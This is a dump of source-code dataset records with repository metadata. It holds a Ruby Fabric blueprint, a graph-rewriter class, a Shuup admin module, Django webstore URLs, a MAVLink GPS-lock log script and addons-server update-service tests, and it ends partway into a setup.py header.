repo_name (stringlengths 6-90) | path (stringlengths 4-230) | copies (stringlengths 1-4) | size (stringlengths 4-7) | content (stringlengths 734-985k) | license (stringclasses 15 values) | hash (int64 -9,223,303,126,770,100,000 to 9,223,233,360B) | line_mean (float64 3.79-99.6) | line_max (int64 19-999) | alpha_frac (float64 0.25-0.96) | autogenerated (bool 1 class) | ratio (float64 1.5-8.06) | config_test (bool 2 classes) | has_no_keywords (bool 2 classes) | few_assignments (bool 1 class)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---
adisbladis/blues | blues/ruby.py | 3 | 1148 | """
Ruby Blueprint
==============
**Fabric environment:**
.. code-block:: yaml
blueprints:
- blues.ruby
settings:
ruby:
gems: # List of ruby gems to install (Optional)
# - sass
"""
from fabric.decorators import task
from refabric.api import run, info
from refabric.context_managers import sudo
from refabric.contrib import blueprints
from . import debian
__all__ = ['setup', 'configure']
blueprint = blueprints.get(__name__)
@task
def setup():
"""
Install Ruby and configured gems
"""
install()
configure()
@task
def configure():
"""
Install configured gems
"""
install_gems()
def install():
with sudo():
info('Installing Ruby v1.9.3')
debian.apt_get('install', 'ruby1.9.3')
info('Installing Bundler')
gem('install', 'bundler')
def install_gems():
gems = blueprint.get('gems', [])
if gems:
info('Installing Gems')
gem('install', *gems)
def gem(command, *options):
info('Running gem {}', command)
with sudo():
run('gem {} {} --no-ri --no-rdoc'.format(command, ' '.join(options)))
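# Usage sketch (assumption: invoked through Fabric with refabric on the path);
# the task names below follow the @task definitions above:
#   fab ruby.setup      # apt-installs ruby1.9.3 and Bundler, then configured gems
#   fab ruby.configure  # (re)installs only the gems listed under settings.ruby.gems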
| mit | 2,994,391,823,487,653,000 | 15.882353 | 77 | 0.584495 | false | 3.447447 | false | false | false |
levilucio/SyVOLT | t_core/rewriter.py | 1 | 4539 |
from .rule_primitive import RulePrimitive
from .messages import TransformationException
from core.himesis import Himesis
from core.himesis_utils import update_equations
from solver.simple_attribute_equation_evaluator import is_consistent
import traceback
import re
class Rewriter(RulePrimitive):
'''
Transforms the matched source model elements according to the specified post-condition pattern.
'''
def __init__(self, condition):
'''
        Transforms the bound subgraph of the source graph according to the specification of the post-condition pattern.
        @param condition: The post-condition pattern.
'''
super(Rewriter, self).__init__()
self.condition = condition
def __str__(self):
s = super(Rewriter, self).__str__()
s = s.split(' ')
s.insert(1, '[%s]' % self.condition.name)
        return ' '.join(s)  # join directly; reduce() is not a builtin in Python 3
def packet_in(self, packet, verbosity = 0):
self.exception = None
self.is_success = False
if self.condition.pre[Himesis.Constants.GUID] not in packet.match_sets:
self.is_success = False
# TODO: This should be a TransformationLanguageSpecificException
self.exception = TransformationException()
self.exception.packet = packet
return packet
else:
match = packet.match_sets[self.condition.pre[Himesis.Constants.GUID]].match2rewrite
try:
mapping = match.to_label_mapping(packet.graph)
# Apply the transformation on the match
if verbosity > 0:
print("Rewriter mapping: " + str(mapping))
graph_eqs = packet.graph["equations"]
try:
cond_eqs = self.condition["equations"]
except KeyError:
cond_eqs = []
if cond_eqs and graph_eqs != cond_eqs:
#get dict from label to node num
RHS_labels = {}
for n, node in enumerate(self.condition.vs):
if node["MT_label__"] == '':
continue
RHS_labels[int(node["MT_label__"])] = n
new_mapping = {}
j=0
vcount = packet.graph.vcount()
#make sure to iterate in natural order
for label in sorted(RHS_labels.keys()):
#use mapping if possible
if str(label) in mapping:
new_mapping[label] = mapping[str(label)]
#assume nodes will be added in this order
#TODO: Handle deleted nodes
else:
new_mapping[label] = vcount + j
j += 1
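                # Illustrative example (assumed shapes): with matched labels
                # {'1': 7, '2': 9} and vcount == 12, RHS labels 1..3 produce
                # new_mapping == {1: 7, 2: 9, 3: 12}; label 3 is a created
                # node expected to be appended after the 12 existing vertices.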
new_cond_eqs = update_equations(cond_eqs, new_mapping)
packet.graph["equations"] += new_cond_eqs
if not is_consistent(packet.graph):
if verbosity >= 2:
print("Graph: " + packet.graph.name + " has inconsistent equations inside")
self.is_success = False
return packet
self.condition.execute(packet, mapping) # Sets dirty nodes as well
except Exception as e:
tb = traceback.format_exc()
print("Rewriter Error: " + str(e))
print(tb)
print("packet.graph: " + packet.graph.name)
print("self.condition: " + self.condition.name)
#raise
self.is_success = False
self.exception = TransformationException(e)
self.exception.packet = packet
self.exception.transformation_unit = self
return packet
# Remove the match
packet.match_sets[self.condition.pre[Himesis.Constants.GUID]].match2rewrite = None
if len(packet.match_sets[self.condition.pre[Himesis.Constants.GUID]].matches) == 0:
del packet.match_sets[self.condition.pre[Himesis.Constants.GUID]]
#print self.condition
self.is_success = True
return packet
| mit | -5,431,089,744,704,395,000 | 36.142857 | 117 | 0.50738 | false | 4.839019 | false | false | false |
suutari-ai/shoop | shuup/admin/modules/contact_groups/__init__.py | 3 | 2024 | # -*- coding: utf-8 -*-
# This file is part of Shuup.
#
# Copyright (c) 2012-2017, Shoop Commerce Ltd. All rights reserved.
#
# This source code is licensed under the OSL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from shuup.admin.base import AdminModule, MenuEntry
from shuup.admin.menu import STOREFRONT_MENU_CATEGORY
from shuup.admin.utils.permissions import get_default_model_permissions
from shuup.admin.utils.urls import (
admin_url, derive_model_url, get_edit_and_list_urls
)
from shuup.core.models import ContactGroup
class ContactGroupModule(AdminModule):
name = _("Contact Groups")
breadcrumbs_menu_entry = MenuEntry(name, url="shuup_admin:contact_group.list")
def get_urls(self):
return [
admin_url(
"^contact_group/(?P<pk>\d+)/delete/$",
"shuup.admin.modules.contact_groups.views.ContactGroupDeleteView",
name="contact_group.delete",
permissions=["shuup.delete_contactgroup"],
)
] + get_edit_and_list_urls(
url_prefix="^contact_group",
view_template="shuup.admin.modules.contact_groups.views.ContactGroup%sView",
name_template="contact_group.%s",
permissions=get_default_model_permissions(ContactGroup),
)
def get_menu_entries(self, request):
return [
MenuEntry(
text=self.name,
icon="fa fa-asterisk",
url="shuup_admin:contact_group.list",
category=STOREFRONT_MENU_CATEGORY,
subcategory="other_settings",
ordering=2
),
]
def get_required_permissions(self):
return get_default_model_permissions(ContactGroup)
def get_model_url(self, object, kind):
return derive_model_url(ContactGroup, "shuup_admin:contact_group", object, kind)
| agpl-3.0 | -7,866,033,174,984,438,000 | 35.142857 | 88 | 0.64081 | false | 3.776119 | false | false | false |
brittdawn/django-webstore | webstore/urls.py | 2 | 3563 | """webstore URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from carts.views import CartView, ItemCountView, CheckoutView, CheckoutFinalView
from invoice.views import (
AddressSelectFormView,
UserAddressCreateView,
OrderList,
UserCheckoutAPI,
OrderDetail
)
from products.views import (
APIHomeView,
CategoryListAPIView,
CategoryRetrieveAPIView,
ProductListAPIView,
ProductRetrieveAPIView,
)
# =========================================================================
# Enabling RESTful architecture with dynamic urls.
# Overall url patterns for webstore.
# =========================================================================
urlpatterns = [
url(r'^$', 'subscribers.views.home', name='home'),
url(r'^about/$', 'webstore.views.about', name='about'),
url(r'^admin/', admin.site.urls),
url(r'^accounts/', include('registration.backends.default.urls')),
url(r'^products/', include('products.urls')),
url(r'^categories/', include('products.urls_categories')),
url(r'^orders/$', OrderList.as_view(), name='orders'),
url(r'^orders/(?P<pk>\d+)/$', OrderDetail.as_view(), name='order_detail'),
url(r'^cart/$', CartView.as_view(), name='cart'),
url(r'^cart/count/$', ItemCountView.as_view(), name='item_count'),
url(r'^checkout/$', CheckoutView.as_view(), name='checkout'),
url(r'^checkout/address/$', AddressSelectFormView.as_view(), name='checkout_address'),
url(r'^checkout/address/add/$', UserAddressCreateView.as_view(), name='user_address_create'),
url(r'^checkout/final/$', CheckoutFinalView.as_view(), name='checkout_final'),
url(r'^docs/', include('rest_framework_docs.urls')),
]
#API Patterns
urlpatterns += [
url(r'^api/$', APIHomeView.as_view(), name='home_api'),
url(r'^api/auth/token/$', 'rest_framework_jwt.views.obtain_jwt_token'),
url(r'^api/auth/token/refresh$', 'rest_framework_jwt.views.refresh_jwt_token'),
url(r'^api/categories/$', CategoryListAPIView.as_view(), name='categories_api'),
url(r'^api/categories/(?P<pk>\d+)/$', CategoryRetrieveAPIView.as_view(), name='category_detail_api'),
url(r'^api/products/$', ProductListAPIView.as_view(), name='products_api'),
url(r'^api/products/(?P<pk>\d+)/$', ProductRetrieveAPIView.as_view(), name='product_detail_api'),
url(r'^api/user/checkout/$', UserCheckoutAPI.as_view(), name='user_checkout_api'),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| mit | -7,629,831,077,194,379,000 | 48.486111 | 105 | 0.616896 | false | 3.898249 | false | false | false |
TheMrNomis/mavlink | pymavlink/tools/mavgpslock.py | 47 | 2056 | #!/usr/bin/env python
'''
show GPS lock events in a MAVLink log
'''
import sys, time, os
from argparse import ArgumentParser
parser = ArgumentParser(description=__doc__)
parser.add_argument("--condition", default=None, help="condition for packets")
parser.add_argument("logs", metavar="LOG", nargs="+")
args = parser.parse_args()
from pymavlink import mavutil
def lock_time(logfile):
'''work out gps lock times for a log file'''
print("Processing log %s" % filename)
mlog = mavutil.mavlink_connection(filename)
locked = False
start_time = 0.0
total_time = 0.0
t = None
m = mlog.recv_match(type=['GPS_RAW_INT','GPS_RAW'], condition=args.condition)
if m is None:
return 0
unlock_time = time.mktime(time.localtime(m._timestamp))
while True:
m = mlog.recv_match(type=['GPS_RAW_INT','GPS_RAW'], condition=args.condition)
if m is None:
if locked:
total_time += time.mktime(t) - start_time
if total_time > 0:
print("Lock time : %u:%02u" % (int(total_time)/60, int(total_time)%60))
return total_time
t = time.localtime(m._timestamp)
if m.fix_type >= 2 and not locked:
print("Locked at %s after %u seconds" % (time.asctime(t),
time.mktime(t) - unlock_time))
locked = True
start_time = time.mktime(t)
elif m.fix_type == 1 and locked:
print("Lost GPS lock at %s" % time.asctime(t))
locked = False
total_time += time.mktime(t) - start_time
unlock_time = time.mktime(t)
elif m.fix_type == 0 and locked:
print("Lost protocol lock at %s" % time.asctime(t))
locked = False
total_time += time.mktime(t) - start_time
unlock_time = time.mktime(t)
return total_time
total = 0.0
for filename in args.logs:
total += lock_time(filename)
print("Total time locked: %u:%02u" % (int(total)/60, int(total)%60))
| lgpl-3.0 | -8,487,313,588,117,863,000 | 31.125 | 87 | 0.578794 | false | 3.607018 | false | false | false |
kumar303/addons-server | src/olympia/addons/tests/test_update.py | 2 | 26966 | # -*- coding: utf-8 -*-
import json
from unittest import mock
from datetime import datetime, timedelta
from email import utils
from django.db import connection
from services import update
from olympia import amo
from olympia.addons.models import (
Addon, CompatOverride, CompatOverrideRange, IncompatibleVersions)
from olympia.amo.tests import TestCase
from olympia.applications.models import AppVersion
from olympia.files.models import File
from olympia.versions.models import ApplicationsVersions, Version
class VersionCheckMixin(object):
def get_update_instance(self, data):
instance = update.Update(data)
instance.cursor = connection.cursor()
return instance
class TestDataValidate(VersionCheckMixin, TestCase):
fixtures = ['base/addon_3615', 'base/appversion']
def setUp(self):
super(TestDataValidate, self).setUp()
self.data = {
'id': '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}',
'version': '2.0.58',
'reqVersion': 1,
'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}',
'appVersion': '3.7a1pre',
}
def test_app_os(self):
data = self.data.copy()
data['appOS'] = 'something %s penguin' % amo.PLATFORM_LINUX.api_name
instance = self.get_update_instance(data)
assert instance.is_valid()
assert instance.data['appOS'] == amo.PLATFORM_LINUX.id
def test_app_version_fails(self):
data = self.data.copy()
del data['appID']
instance = self.get_update_instance(data)
assert not instance.is_valid()
def test_app_version_wrong(self):
data = self.data.copy()
data['appVersion'] = '67.7'
instance = self.get_update_instance(data)
# If you pass through the wrong version that's fine
# you will just end up with no updates because your
# version_int will be out.
assert instance.is_valid()
def test_app_version(self):
data = self.data.copy()
instance = self.get_update_instance(data)
assert instance.is_valid()
assert instance.data['version_int'] == 3070000001000
def test_sql_injection(self):
data = self.data.copy()
data['id'] = "'"
instance = self.get_update_instance(data)
assert not instance.is_valid()
def test_inactive(self):
addon = Addon.objects.get(pk=3615)
addon.update(disabled_by_user=True)
instance = self.get_update_instance(self.data)
assert not instance.is_valid()
def test_soft_deleted(self):
addon = Addon.objects.get(pk=3615)
addon.update(status=amo.STATUS_DELETED)
instance = self.get_update_instance(self.data)
assert not instance.is_valid()
def test_disabled(self):
addon = Addon.objects.get(pk=3615)
addon.update(status=amo.STATUS_DISABLED)
instance = self.get_update_instance(self.data)
assert not instance.is_valid()
def test_no_version(self):
data = self.data.copy()
del data['version']
instance = self.get_update_instance(data)
assert instance.is_valid()
def test_unlisted_addon(self):
"""Add-ons with only unlisted versions are valid, they just don't
        receive any updates (see TestLookup.test_no_unlisted below)."""
addon = Addon.objects.get(pk=3615)
self.make_addon_unlisted(addon)
instance = self.get_update_instance(self.data)
assert instance.is_valid()
class TestLookup(VersionCheckMixin, TestCase):
fixtures = ['addons/update', 'base/appversion']
def setUp(self):
super(TestLookup, self).setUp()
self.addon = Addon.objects.get(id=1865)
self.platform = None
self.version_int = 3069900200100
self.app = amo.APP_IDS[1]
self.version_1_0_2 = 66463
self.version_1_1_3 = 90149
self.version_1_2_0 = 105387
self.version_1_2_1 = 112396
self.version_1_2_2 = 115509
def get_update_instance(self, *args):
data = {
'id': self.addon.guid,
'appID': args[2].guid,
'appVersion': 1, # this is going to be overridden
'appOS': args[3].api_name if args[3] else '',
'reqVersion': '',
}
# Allow version to be optional.
if args[0]:
data['version'] = args[0]
instance = super(TestLookup, self).get_update_instance(data)
assert instance.is_valid()
instance.data['version_int'] = args[1]
instance.get_update()
return (instance.data['row'].get('version_id'),
instance.data['row'].get('file_id'))
def change_status(self, version, status):
version = Version.objects.get(pk=version)
file = version.files.all()[0]
file.status = status
file.save()
return version
def change_version(self, version, name):
Version.objects.get(pk=version).update(version=name)
def test_low_client(self):
"""
Version 3.0a1 of Firefox is 3000000001100 and version 1.0.2 of the
add-on is returned.
"""
version, file = self.get_update_instance(
'', '3000000001100', self.app, self.platform)
assert version == self.version_1_0_2
def test_new_client(self):
"""
Version 3.0.12 of Firefox is 3069900200100 and version 1.2.2 of the
add-on is returned.
"""
version, file = self.get_update_instance(
'', self.version_int, self.app, self.platform)
assert version == self.version_1_2_2
def test_min_client(self):
"""
Version 3.7a5pre of Firefox is 3070000005000 and version 1.1.3 of
the add-on is returned, because all later ones are set to minimum
version of 3.7a5.
"""
for version in Version.objects.filter(pk__gte=self.version_1_2_0):
appversion = version.apps.all()[0]
appversion.min = AppVersion.objects.get(pk=325) # 3.7a5
appversion.save()
version, file = self.get_update_instance(
'', '3070000005000', self.app, self.platform) # 3.7a5pre
assert version == self.version_1_1_3
def test_new_client_ordering(self):
"""
Given the following:
* Version 15 (1 day old), max application_version 3.6*
* Version 12 (1 month old), max application_version 3.7a
We want version 15, even though version 12 is for a higher version.
This was found in https://bugzilla.mozilla.org/show_bug.cgi?id=615641.
"""
application_version = ApplicationsVersions.objects.get(pk=77550)
application_version.max_id = 350
application_version.save()
# Version 1.2.2 is now a lower max version.
application_version = ApplicationsVersions.objects.get(pk=88490)
application_version.max_id = 329
application_version.save()
version, file = self.get_update_instance(
'', self.version_int, self.app, self.platform)
assert version == self.version_1_2_2
def test_public(self):
"""
If the addon status is public then you get a public version.
"""
self.change_status(self.version_1_2_2, amo.STATUS_PENDING)
self.addon.reload()
assert self.addon.status == amo.STATUS_APPROVED
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, self.platform)
assert version == self.version_1_2_1
def test_no_unlisted(self):
"""
Unlisted versions are always ignored, never served as updates.
"""
Version.objects.get(pk=self.version_1_2_2).update(
channel=amo.RELEASE_CHANNEL_UNLISTED)
self.addon.reload()
assert self.addon.status == amo.STATUS_APPROVED
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, self.platform)
assert version == self.version_1_2_1
def test_can_downgrade(self):
"""
Check that we can downgrade, if 1.2.0 gets admin disabled
and the oldest public version is now 1.1.3.
"""
self.change_status(self.version_1_2_0, amo.STATUS_PENDING)
for v in Version.objects.filter(pk__gte=self.version_1_2_1):
v.delete()
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, self.platform)
assert version == self.version_1_1_3
def test_public_pending_exists(self):
"""
If the addon status is public and you are asking
for a beta version we look up a version based on the
file version at that point. In this case, because the
file is pending, we are looking for something public.
"""
self.change_status(self.version_1_2_2, amo.STATUS_PENDING)
self.change_status(self.version_1_2_0, amo.STATUS_PENDING)
self.change_version(self.version_1_2_0, '1.2beta')
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, self.platform)
assert version == self.version_1_2_1
def test_public_pending_no_file_beta(self):
"""
If the addon status is public and you are asking
for a beta version we look up a version based on the
file version at that point. If there are no files,
find a public version.
"""
self.change_version(self.version_1_2_0, '1.2beta')
Version.objects.get(pk=self.version_1_2_0).files.all().delete()
version, file = self.get_update_instance(
'1.2beta', self.version_int, self.app, self.platform)
dest = Version.objects.get(pk=self.version_1_2_2)
assert dest.addon.status == amo.STATUS_APPROVED
assert dest.files.all()[0].status == amo.STATUS_APPROVED
assert version == dest.pk
def test_not_public(self):
"""
If the addon status is not public, then the update only
looks for files within that one version.
"""
self.change_status(self.version_1_2_2, amo.STATUS_NULL)
self.addon.update(status=amo.STATUS_NULL)
version, file = self.get_update_instance(
'1.2.1', self.version_int, self.app, self.platform)
assert version == self.version_1_2_1
def test_platform_does_not_exist(self):
"""If client passes a platform, find that specific platform."""
version = Version.objects.get(pk=115509)
for file in version.files.all():
file.platform = amo.PLATFORM_LINUX.id
file.save()
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, self.platform)
assert version == self.version_1_2_1
def test_platform_exists(self):
"""If client passes a platform, find that specific platform."""
version = Version.objects.get(pk=115509)
for file in version.files.all():
file.platform = amo.PLATFORM_LINUX.id
file.save()
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, amo.PLATFORM_LINUX)
assert version == self.version_1_2_2
def test_file_for_platform(self):
"""If client passes a platform, make sure we get the right file."""
version = Version.objects.get(pk=self.version_1_2_2)
file_one = version.files.all()[0]
file_one.platform = amo.PLATFORM_LINUX.id
file_one.save()
file_two = File(version=version, filename='foo', hash='bar',
platform=amo.PLATFORM_WIN.id,
status=amo.STATUS_APPROVED)
file_two.save()
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, amo.PLATFORM_LINUX)
assert version == self.version_1_2_2
assert file == file_one.pk
version, file = self.get_update_instance(
'1.2', self.version_int, self.app, amo.PLATFORM_WIN)
assert version == self.version_1_2_2
assert file == file_two.pk
class TestDefaultToCompat(VersionCheckMixin, TestCase):
"""
Test default to compatible with all the various combinations of input.
"""
fixtures = ['addons/default-to-compat']
def setUp(self):
super(TestDefaultToCompat, self).setUp()
self.addon = Addon.objects.get(id=337203)
self.platform = None
self.app = amo.APP_IDS[1]
self.app_version_int_3_0 = 3000000200100
self.app_version_int_4_0 = 4000000200100
self.app_version_int_5_0 = 5000000200100
self.app_version_int_6_0 = 6000000200100
self.app_version_int_7_0 = 7000000200100
self.app_version_int_8_0 = 8000000200100
self.ver_1_0 = 1268881
self.ver_1_1 = 1268882
self.ver_1_2 = 1268883
self.ver_1_3 = 1268884
self.expected = {
'3.0-strict': None, '3.0-normal': None, '3.0-ignore': None,
'4.0-strict': self.ver_1_0,
'4.0-normal': self.ver_1_0,
'4.0-ignore': self.ver_1_0,
'5.0-strict': self.ver_1_2,
'5.0-normal': self.ver_1_2,
'5.0-ignore': self.ver_1_2,
'6.0-strict': self.ver_1_3,
'6.0-normal': self.ver_1_3,
'6.0-ignore': self.ver_1_3,
'7.0-strict': self.ver_1_3,
'7.0-normal': self.ver_1_3,
'7.0-ignore': self.ver_1_3,
'8.0-strict': None,
'8.0-normal': self.ver_1_3,
'8.0-ignore': self.ver_1_3,
}
def create_override(self, **kw):
co = CompatOverride.objects.create(
name='test', guid=self.addon.guid, addon=self.addon
)
default = dict(compat=co, app=self.app.id, min_version='0',
max_version='*', min_app_version='0',
max_app_version='*')
default.update(kw)
CompatOverrideRange.objects.create(**default)
def update_files(self, **kw):
for version in self.addon.versions.all():
for file in version.files.all():
file.update(**kw)
def get_update_instance(self, **kw):
instance = super(TestDefaultToCompat, self).get_update_instance({
'reqVersion': 1,
'id': self.addon.guid,
'version': kw.get('item_version', '1.0'),
'appID': self.app.guid,
'appVersion': kw.get('app_version', '3.0'),
})
assert instance.is_valid()
instance.compat_mode = kw.get('compat_mode', 'strict')
instance.get_update()
return instance.data['row'].get('version_id')
def check(self, expected):
"""
Checks Firefox versions 3.0 to 8.0 in each compat mode and compares it
to the expected version.
"""
versions = ['3.0', '4.0', '5.0', '6.0', '7.0', '8.0']
modes = ['strict', 'normal', 'ignore']
for version in versions:
for mode in modes:
assert (
self.get_update_instance(
app_version=version, compat_mode=mode) ==
expected['-'.join([version, mode])]
)
def test_application(self):
# Basic test making sure application() is returning the output of
# Update.get_output(). Have to mock Update(): otherwise, the real
# database would be hit, not the test one, because of how services
# use a different setting and database connection APIs.
environ = {
'QUERY_STRING': ''
}
self.start_response_call_count = 0
expected_headers = [
('FakeHeader', 'FakeHeaderValue')
]
expected_output = b'{"fake": "output"}'
def start_response_inspector(status, headers):
self.start_response_call_count += 1
assert status == '200 OK'
assert headers == expected_headers
with mock.patch('services.update.Update') as UpdateMock:
update_instance = UpdateMock.return_value
update_instance.get_headers.return_value = expected_headers
update_instance.get_output.return_value = expected_output
output = update.application(environ, start_response_inspector)
assert self.start_response_call_count == 1
# Output is an array with a single string containing the body of the
# response.
assert output == [expected_output]
def test_baseline(self):
# Tests simple add-on (non-binary-components, non-strict).
self.check(self.expected)
def test_binary_components(self):
# Tests add-on with binary_components flag.
self.update_files(binary_components=True)
self.expected.update({
'8.0-normal': None,
})
self.check(self.expected)
def test_extension_compat_override(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override.
self.create_override(min_version='1.3', max_version='1.3')
self.expected.update({
'6.0-normal': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': self.ver_1_2,
})
self.check(self.expected)
def test_binary_component_compat_override(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override.
self.update_files(binary_components=True)
self.create_override(min_version='1.3', max_version='1.3')
self.expected.update({
'6.0-normal': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': None,
})
self.check(self.expected)
def test_strict_opt_in(self):
# Tests add-on with opt-in strict compatibility
self.update_files(strict_compatibility=True)
self.expected.update({
'8.0-normal': None,
})
self.check(self.expected)
def test_compat_override_max_addon_wildcard(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a max wildcard.
self.create_override(min_version='1.2', max_version='1.3',
min_app_version='5.0', max_app_version='6.*')
self.expected.update({
'5.0-normal': self.ver_1_1,
'6.0-normal': self.ver_1_1,
})
self.check(self.expected)
def test_compat_override_max_app_wildcard(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a min/max wildcard for the app.
self.create_override(min_version='1.2', max_version='1.3')
self.expected.update({
'5.0-normal': self.ver_1_1,
'6.0-normal': self.ver_1_1,
'7.0-normal': self.ver_1_1,
'8.0-normal': self.ver_1_1,
})
self.check(self.expected)
def test_compat_override_both_wildcards(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a wildcard for both addon version and app
# version.
self.create_override(min_app_version='7.0', max_app_version='*')
self.expected.update({
'7.0-normal': None,
'8.0-normal': None,
})
self.check(self.expected)
def test_compat_override_invalid_version(self):
# Tests compat override range where version doesn't match our
# versioning scheme. This results in no versions being written to the
# incompatible_versions table.
self.create_override(min_version='ver1', max_version='ver2')
assert IncompatibleVersions.objects.all().count() == 0
def test_min_max_version(self):
# Tests the minimum requirement of the app maxVersion.
av = self.addon.current_version.apps.all()[0]
av.min_id = 233 # Firefox 3.0.
av.max_id = 268 # Firefox 3.5.
av.save()
self.expected.update({
'3.0-strict': self.ver_1_3,
'3.0-ignore': self.ver_1_3,
'4.0-ignore': self.ver_1_3,
'5.0-ignore': self.ver_1_3,
'6.0-strict': self.ver_1_2,
'6.0-normal': self.ver_1_2,
'7.0-strict': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': self.ver_1_2,
})
self.check(self.expected)
class TestResponse(VersionCheckMixin, TestCase):
fixtures = ['base/addon_3615']
def setUp(self):
super(TestResponse, self).setUp()
self.addon_one = Addon.objects.get(pk=3615)
self.data = {
'id': '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}',
'version': '2.0.58',
'reqVersion': 1,
'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}',
'appVersion': '3.7a1pre',
}
self.mac = amo.PLATFORM_MAC
self.win = amo.PLATFORM_WIN
def test_bad_guid(self):
self.data['id'] = 'garbage'
instance = self.get_update_instance(self.data)
assert json.loads(instance.get_output()) == instance.get_error_output()
def test_no_platform(self):
file = File.objects.get(pk=67442)
file.platform = self.win.id
file.save()
data = self.data.copy()
data['appOS'] = self.win.api_name
instance = self.get_update_instance(data)
assert instance.get_output()
assert instance.data['row']['file_id'] == file.pk
data['appOS'] = self.mac.api_name
instance = self.get_update_instance(data)
assert (
json.loads(instance.get_output()) ==
instance.get_no_updates_output())
def test_different_platform(self):
file = File.objects.get(pk=67442)
file.platform = self.win.id
file.save()
file_pk = file.pk
file.id = None
file.platform = self.mac.id
file.save()
mac_file_pk = file.pk
data = self.data.copy()
data['appOS'] = self.win.api_name
instance = self.get_update_instance(data)
instance.is_valid()
instance.get_update()
assert instance.data['row']['file_id'] == file_pk
data['appOS'] = self.mac.api_name
instance = self.get_update_instance(data)
instance.is_valid()
instance.get_update()
assert instance.data['row']['file_id'] == mac_file_pk
def test_good_version(self):
instance = self.get_update_instance(self.data)
instance.is_valid()
instance.get_update()
assert instance.data['row']['hash'].startswith('sha256:3808b13e')
assert instance.data['row']['min'] == '2.0'
assert instance.data['row']['max'] == '4.0'
def test_no_app_version(self):
data = self.data.copy()
data['appVersion'] = '1.4'
instance = self.get_update_instance(data)
instance.is_valid()
assert not instance.get_update()
def test_low_app_version(self):
data = self.data.copy()
data['appVersion'] = '2.0'
instance = self.get_update_instance(data)
instance.is_valid()
instance.get_update()
assert instance.data['row']['hash'].startswith('sha256:3808b13e')
assert instance.data['row']['min'] == '2.0'
assert instance.data['row']['max'] == '4.0'
def test_content_type(self):
instance = self.get_update_instance(self.data)
        assert ('Content-Type', 'text/xml') in instance.get_headers(1)
def test_cache_control(self):
instance = self.get_update_instance(self.data)
        assert ('Cache-Control', 'public, max-age=3600') in instance.get_headers(1)
def test_length(self):
instance = self.get_update_instance(self.data)
        assert ('Cache-Length', '1') in instance.get_headers(1)
def test_expires(self):
"""Check there are these headers and that expires is 3600 later."""
# We aren't bother going to test the actual time in expires, that
# way lies pain with broken tests later.
instance = self.get_update_instance(self.data)
headers = dict(instance.get_headers(1))
last_modified = datetime(
*utils.parsedate_tz(headers['Last-Modified'])[:7])
expires = datetime(*utils.parsedate_tz(headers['Expires'])[:7])
assert (expires - last_modified).seconds == 3600
def get_file_url(self):
"""Return the file url with the hash as parameter."""
return (
'http://testserver/user-media/addons/3615/'
'delicious_bookmarks-2.1.072-fx.xpi?'
'filehash=sha256%3A3808b13ef8341378b9c8305ca648200954ee7dcd8dc'
'e09fef55f2673458bc31f')
def test_url(self):
instance = self.get_update_instance(self.data)
instance.get_output()
assert instance.data['row']['url'] == self.get_file_url()
def test_url_local_recent(self):
a_bit_ago = datetime.now() - timedelta(seconds=60)
File.objects.get(pk=67442).update(datestatuschanged=a_bit_ago)
instance = self.get_update_instance(self.data)
instance.get_output()
assert instance.data['row']['url'] == self.get_file_url()
def test_hash(self):
content = self.get_update_instance(self.data).get_output()
data = json.loads(content)
file = File.objects.get(pk=67442)
guid = '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}'
assert data['addons'][guid]['updates'][0]['update_hash'] == file.hash
file = File.objects.get(pk=67442)
file.hash = ''
file.save()
content = self.get_update_instance(self.data).get_output()
data = json.loads(content)
assert 'update_hash' not in data['addons'][guid]['updates'][0]
def test_release_notes(self):
content = self.get_update_instance(self.data).get_output()
data = json.loads(content)
guid = '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}'
assert data['addons'][guid]['updates'][0]['update_info_url']
version = Version.objects.get(pk=81551)
version.update(release_notes=None)
content = self.get_update_instance(self.data).get_output()
data = json.loads(content)
assert 'update_info_url' not in data['addons'][guid]['updates'][0]
def test_no_updates_at_all(self):
self.addon_one.versions.all().delete()
instance = self.get_update_instance(self.data)
assert (
json.loads(instance.get_output()) ==
instance.get_no_updates_output())
def test_no_updates_my_fx(self):
data = self.data.copy()
data['appVersion'] = '5.0.1'
instance = self.get_update_instance(data)
assert (
json.loads(instance.get_output()) ==
instance.get_no_updates_output())
| bsd-3-clause | -3,774,008,587,513,542,700 | 35.939726 | 79 | 0.59334 | false | 3.565045 | true | false | false |
monetizeio/dj-user | setup.py | 1 | 2096 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright © 2013 by its contributors. See AUTHORS for details.
